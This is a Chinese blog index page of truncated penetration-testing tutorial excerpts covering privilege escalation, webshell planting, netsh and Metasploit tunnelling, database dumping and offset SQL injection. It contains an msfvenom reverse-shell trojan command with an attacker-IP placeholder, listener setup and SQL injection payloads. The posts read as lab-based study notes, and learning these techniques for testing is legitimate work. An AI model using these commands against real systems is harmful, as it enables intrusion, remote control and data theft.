HeyBoy's Blog

Hello World,Hey Boy~ [+] Menu


Posts tagged under 渗透测试


Linux提权常用方法思路总结

渗透测试

以下是总结的提权思路和方法,来自于小迪的课程。 1.信息搜集 https://github.com/sleventyeleven/linuxprivchecker,https://github.com/rebootuser/LinEnum linuxprivchecker依赖python环境,而LinEnum不用。 2.漏洞查找 https://github.com/mzet-/linux-exploit-suggester,https://github.com/jondonas/linux-exploit-suggester-2 linux-exploit-suggester输出的结果更美观详细,但可能存在误报。linux-exploit-suggester-2输出的结果更简洁,更准确误报较少。 3.提权思路 利用系统特性:SUID,环境变量(用户设置了SUID权限的应用程序,该程序调用了其他命令,通过更改环境变量来劫持该命令,比如打开一个shell),计划任务(如果计划任务中脚本内容有通配符,比如cd... continue reading

Jason Wang

拿webshell的思路总结

渗透测试

1.通过web漏洞拿webshell 能直接拿webshell的有文件上传,文件包含,sql注入,命令执行。也可以和其他漏洞配合使用。 2.进后台拿webshell 使用sql注入,xss,弱口令进后台,找文件上传,数据备份,模板编辑,文件管理,sql执行功能点进行利用。 3.通用漏洞拿webshell 确定目标网站使用的cms,寻找公开漏洞,如果有源码,可结合进行审计。如果目标网站未知cms,则参考第一条。 寻找网站的第三方组件,编辑器,phpmyadmin,中间件,框架的漏洞。... continue reading

Jason Wang

Windows提权常用方法思路总结

渗透测试

以下是总结的提权思路和方法,来自于小迪的课程。 先上张思维导图: 1.Webshell 如果已知cms,则找公开的拿webshell的方法。如果未知cms,则找模板编辑,sql执行,文件管理,文件上传,文件备份的功能点。如果有源码,可配合源码审计。 2.Windows系统提权 使用systeminfo命令进行补丁收集,使用开源工具查找可能存在的权限提升漏洞。 三款开源工具:https://github.com/chroblert/WindowsVulnScan,https://github.com/vulmon/Vulmap,https://github.com/bitsadmin/wesng 其中WindowsVulnScan是ps1脚本适用于Windows本地提权或服务器上有powershell的情况。Vulmap适用于Linux,Windows比较弱。wesng就是Windows Exploit Suggester – Next Generation... continue reading

Jason Wang

metasploit使用netsh隧道

渗透测试

netsh是Windows自带的一个系统工具,在渗透中,如果我们拿到的主机是Windows系统,可以使用netsh来进行端口转发。 关于netsh的用法,请访问:https://www.jason-w.cn/pentest/2021/03/30/278.html 实验环境有三台主机,一台是KALI作为攻击主机,IP为:192.168.1.5,另一台是公网服务器,IP为:192.168.1.10和10.10.10.100,还有一台是内网服务器,IP为:10.10.10.128。 这三台主机都是由虚拟机进行模拟的,其中KALI和公网服务器在同一个段,所以可以直接互通。公网服务器有两个网卡,也就是两个IP地址,观察上述IP,... continue reading

Jason Wang

端口转发之netsh

渗透测试

netsh是Windows自带的一个系统工具,在渗透中,如果我们拿到的主机是Windows系统,可以使用netsh来进行端口转发。 实验环境有三台主机,一台是KALI作为攻击主机,IP为:192.168.1.5,另一台是公网服务器,IP为:192.168.1.10和10.10.10.100,还有一台是内网服务器,IP为:10.10.10.128。 这三台主机都是由虚拟机进行模拟的,其中KALI和公网服务器在同一个段,所以可以直接互通。公网服务器有两个网卡,也就是两个IP地址,观察上述IP,发现公网服务器和内网服务器也在一个段,所以可以互通。那么要让KALI访问内网服务器,必须经过公网服务器的转发。 netsh的用法为: netsh interface portproxy add v4tov4 listenport=<... continue reading

Jason Wang

metasploit内网渗透之socks隧道

渗透测试

引言:在本文的所有命令中,<>中的内容代表必填参数,[]中的值代表可选参数,根据实际情况使用对应的值替换尖括号或方括号。下述实验基于msf6。 要实现端口转发,需要先拿到meterpreter权限。方法就是使用msf生成木马,在目标机器上运行。生成木马(假设目标是windows主机): msfvenom -p windows/meterpreter/reverse_tcp lhost=<攻击机IP> lport=<攻击机监听端口> -f exe -o <木马输出路径> 在攻击机执行监听: msfconsole #进入msf控制台 use exploit/multi/handler #选择模块 set payload... continue reading

Jason Wang

metasploit内网渗透之端口转发

渗透测试

引言:在本文的所有命令中,<>中的内容代表必填参数,[]中的值代表可选参数,根据实际情况使用对应的值替换尖括号或方括号。 要实现端口转发,需要先拿到meterpreter权限。方法就是使用msf生成木马,在目标机器上运行。生成木马(假设目标是windows主机): msfvenom -p windows/meterpreter/reverse_tcp lhost=<攻击机IP> lport=<攻击机监听端口> -f exe -o <木马输出路径> 在攻击机执行如下命令: msfconsole #进入msf控制台 use exploit/multi/handler #选择模块 set payload windows/... continue reading

Jason Wang

拖库方法总结

渗透测试

直接打包数据库文件: access数据库的文件为mdb,或者是asp和asa,直接下载该文件即可。 mysql数据库的文件保存在mysql目录下的data文件夹下,该文件夹路径也可能被自定义,具体查看mysql的配置文件。将该目录下的文件打包下载即可。 sqlserver,将msdbdata.mdf,msdblog.ldf打包下载即可。 直接打包方法不是很推荐。 导出为SQL脚本拖库: mysql,找到mysqldump,通常在mysql安装目录下的bin目录下,执行mysqldump  -uroot -p123456 –databases mydb1 > mydb1.sql sqlserver,执行sql语句:backup database Test to disk=’D:/Test.sql’ 使用工具导出为SQL脚本拖库: 使用navicat等工具进行拖库即可。如果数据库是mysql,由于监听的IP默认为:127.0.... continue reading

Jason Wang

后台拿webshell方法总结

渗透测试

如果后台是知名的CMS,可直接问搜索引擎拿webshell的方法。如果后台有上传功能,则直接上传webshell。如果后台只能上传特定后缀的文件,则看下后台可不可以直接修改上传文件后缀的设置项。如果后台上传功能的上传路径可控,可使用%00截断。多数网站系统,尤其是CMS,都有模板功能,在模板中插入webshell,然后使用生成页面功能,根据修改的模板生成一个php页面。如果网站系统的站点信息保存位置不是数据库,而是保存在脚本文件中,那么在站点信息的设置中插入webshell。然后使用客户端连接站点的配置脚本文件。插入的过程中,注意网站程序代码的闭合,尤其是asp文件,代码出错将导致页面无法打开。如果网站系统允许管理自定义页面,则在自定义页面中写入webshell。客户端连接该自定义页面。如果网站是Access数据库,已知数据库路径,以及后缀为asp或者是asa,可在站点信息配置中插入数据库马。客户端链接数据库对应的asp或asa文件。如果网站提供数据库备份与恢复功能,可发表一篇含有webshell的文章,然后使用备份保存该文章的数据表,然后恢复为一个php页面。如果备份与恢复功能的路径无法修改,可使用抓包去尝试绕过。或者是通过编辑器上传一个图片马,将图片马备份恢复为php文件。如果网站系统提供执行sql语句的功能,则可以通过sql写入webshell。... continue reading

Jason Wang

web安全之偏移注入

渗透测试

偏移注入是一种注入姿势,可以根据一个较多字段的表对一个少字段的表进行偏移注入,一般是联合查询,在页面有回显点的情况下 在SQL注入的时候会遇到一些无法查询列名的问题,比如系统自带数据库的权限不够而无法访问系统自带库。 当你猜到表名无法猜到字段名的情况下,我们可以使用偏移注入来查询那张表里面的数据。 像Sqlmap之类的工具实际上是爆破字段的名字,但是如果字段名称比较奇葩,就无可奈何了 假设一个表有8个字段,admin表有3个字段。 联合查询payload:union select 1,2,3,4,5,6,7,8 from admin 在我们不知道admin有多少字段的情况下可以尝试payload:union select 1,2,3,4,5,6,7,admin.* from admin,此时页面出错 直到payload:union select 1,... continue reading

Jason Wang